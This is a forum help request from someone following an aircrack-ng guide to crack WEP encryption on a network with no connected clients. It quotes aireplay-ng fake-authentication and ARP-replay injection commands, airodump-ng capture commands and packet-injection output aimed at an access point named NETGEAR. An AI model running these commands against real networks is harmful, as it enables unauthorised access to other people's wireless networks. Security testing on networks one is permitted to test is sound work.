I am following everything from this guide below very carefully, and I get to step 7
doubleUdoubleUdoubleUDOTaircrack-ngDOTorg/doku.php?id=how_to_crack_wep_with_no_clients
Code:
# aireplay-ng -2 -r arp-request wlan2
...
Saving chosen packet in replay_src-0803-165826.cap
You should also start airodump-ng to capture replies.
However airodump-ng is already running in a different screen window.
Code:
# airodump-ng -c 6 --bssid (APs bssid) -w capturee wlan2
I noticed that the example showed a client connected under the AP connected. I have no clients listed, and this is a guide for "crack wep with no clients"
If it is me as a client that is supposed to show, it is not showing. I ran this command as the guide said to earlier to fake authentication.
aireplay-ng -1 0 -e NETGEAR -a (APs bssid) -h (my bssid) wlan2
So what is going on here?
So far I have
Code:
Saving chosen packet in replay_src-0803-165826.cap
You should also start airodump-ng to capture replies.
Sent 273705 packets...(499 pps)
And it just continues. I don't believe it will ever finish.
Any help appreciated.